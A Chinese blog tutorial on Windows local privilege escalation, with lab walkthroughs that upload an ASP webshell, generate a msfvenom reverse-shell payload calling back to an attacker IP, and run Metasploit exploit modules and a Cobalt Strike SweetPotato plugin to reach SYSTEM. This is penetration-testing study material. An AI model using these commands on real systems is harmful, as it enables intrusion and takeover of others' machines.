windows提权之本地溢出漏洞提权
创始人
2025-05-30 00:02:24
0

0x00 前言

使用溢出漏洞步骤:

1.信息搜集

主要搜集操作系统版本 漏洞补丁 位数 杀软 网络 当前权限等信息

tasklist /svc    #杀软服务
systeminfo       #系统信息,主要是补丁
#当webshell中不能使用system'info命令时们可以上传cmd.exe,然后在使用cmd.exe运行命令

2.根据补丁 系统版本 位数 筛选可用溢出漏洞exp

手动 上传漏洞检测脚本,查看漏洞

msf全自动 msf扫描漏洞,直接利用exp

cs半自动 利用插件,直接利用exp(为什么是半自动,不能检测存在的漏洞)

3.上传exp进行提权

exp下载网站:

https://github.com/Ascotbe/KernelHub
https://github.com/nomi-sec/PoC-in-GitHub
http://cve.mitre.org/data/refs/refmap/source-MS.html

0x01 漏洞检测脚本使用

WindowsVulnScan:

补丁收集脚本:KBCollect.ps1

漏洞扫描脚本:cve-check.py

#补丁收集
powershell      #当powershell不可用时,可以用systeminfo把信息写成json类型的数据进行检测
./KBCollect.ps1 #运行后生成了KB.json
#漏洞扫描
python cve-check.py -C -f KB.json

python如果没有安装requests模块,还需要安装这个模块

python -m pip install -r requirements.txt -i https://pypi.tuna.tsinghua.edu.cn/simple

运行python脚本时报错:

KB.json改一下编码,改成utf-8

KB.json 格式:

{"basicInfo":{"windowsProductName":"Microsoft Windows Server 2016 Standard","windowsVersion":""},"KBList":["KB4049065", #打的补丁编号"KB4048953"
]}
#windowsProductName 操作系统版本

Vulmap:

不好用,查不到漏洞

wesng:

systeminfo >1.txt              
python wes.py 1.txt -o 1.csv    #生成excle表格

0x02 msf全自动

环境:win7 的iis+asp

上传asp的一句话木马

使用蚁剑连接

msf生成反弹的木马,使win7上线

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.85.129 LPORT=3333 -f exe -o 1.exe
#配置监听
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.85.129
set lport 3333
run

使用蚁剑上传木马并运行,查看当前权限

1.exe      #蚁剑运行
getuid     #meterpreter会话中运行

使用漏洞扫描模块

#有两个模块
use post/windows/gather/enum_patches(半自动:找出了补丁还需进行筛选exp)
use post/multi/recon/local_exploit_suggester(全自动:能识别系统中可能被利用的漏洞)#这里选用第二个
background                  #使当前会话切换到后台
use post/multi/recon/local_exploit_suggester
set session 6 
set showdescription yes      #不设置漏洞详情为yes,可能跑不出来漏洞
run        
#选用exp进行利用
use  exploit/windows/local/ms16_075_reflection_juicy
set session 6
run

post/windows/gather/enum_patches 半自动运行:

post/multi/recon/local_exploit_suggester全自动运行:

成功提权:

当exp利用成功时没有返回会话,这时应该去考虑payload是否设置错误,返回不过来,这个漏洞,上传的木马是x64,exp是x86,默认的就可以,不需要改,改成x64利用就不成功,需要注意的是payload能否满足当前需求,也就是能不能返回会话,不如说,一台可以上网的主机去攻击一台公网的服务器,木马的连接方式是反向连接,这肯定不行,肯定没有会话产生,正确的方式是正向连接

x86可以在x64和x86系统中运行,x64只能在x64系统中运行

0x03 cs半自动

环境:win7 iis+asp

#linux服务端:
chmod u+x teamserver
./teamserver 192.168.85.129 123456
#windows客户端:
cobaltstrike.bat

需要配置监听器 http的即可:

第二步点监听器

cobalstrike生成木马

使用蚁剑上传并运行,成功上线

改一下回连时间为0

查看但前权限

getuid

加载插件

使用梼杌插件的本地提权的sweetpotato进行提权,成功返回system的机器

梼杌插件:

成功提权:

相关内容

热门资讯

unity教程||Unity调... 记录下,个人之前做一个项目的时候碰到一个需求,安卓端的app中需要做冷更...
自然语言处理(四): Part... 目录 1. What is Part of Speech (POS)? 词性是什么 2. Infor...
著名央视主持人在甘孜救人,现场... 转自 齐鲁晚报 5月28日 四川甘孜州文广旅局局长刘洪 转发的一条视频 引发关注 视频中,央视主持人...
京郊首个高速停车区主题文化公园... 文、图/赵向红 5月30日,京雄高速(进京方向)房山南停车区内热闹非凡,由“中铁高速”和中国收藏家协...
姑苏首店,玩转假期! 当青石板路遇见首店热潮 当园林雅韵碰撞潮流文化 姑苏区正用首发经济 书写古城商业的破圈秘籍 近期,苏...
缺失的第一个正整数:给定一个未... 给定一个未排序的整数数组,找出其中未出现的最小正整数。 (本文获得CSDN质量评分...
圣祥乳业惊艳第六届北京牛奶文化... 5月29日至31日,由北京市奶业协会主办的第六届北京牛奶文化节在北京中关村移动智能服务创新园(上地・...
原创 拌... #图文打卡计划#大家好呀!今天咱们来聊聊一个让无数厨房新手头疼的问题——为啥自己拌的凉菜总是水汪汪的...
剩米饭大变身!10 分钟做出黄... 家里的剩米饭总在冰箱里 “吃灰”?别浪费!只需 10 分钟,就能将平淡无奇的剩米饭变身金黄酥脆、香气...
原创 空... 端午了,别就知道吃粽子了! 我们吃点新鲜的,艾草戚风蛋糕、奶油粽宝三明治还有脆皮粽子......总有...
如何为孩子挑选健康的零食? 儿童的饮食习惯是他们健康成长的重要基石,然而,如何为孩子挑选健康的零食却让家长感到困惑。根据数据显示...
一口熨斗糕,品尝重庆的童年甜蜜... 在重庆的美食记忆里,熨斗糕宛如一颗甜蜜的糖果,带着童年的纯真与欢乐,让人回味无穷。它那外酥里嫩的口感...
爱情、火锅和踅面 夫妻创业比蜜... 王丽 他生在延安市黄龙县,她诞于韩城市;他总是怀念乡味铜火锅,她一直爱吃家乡的踅面。两人一合计,走!...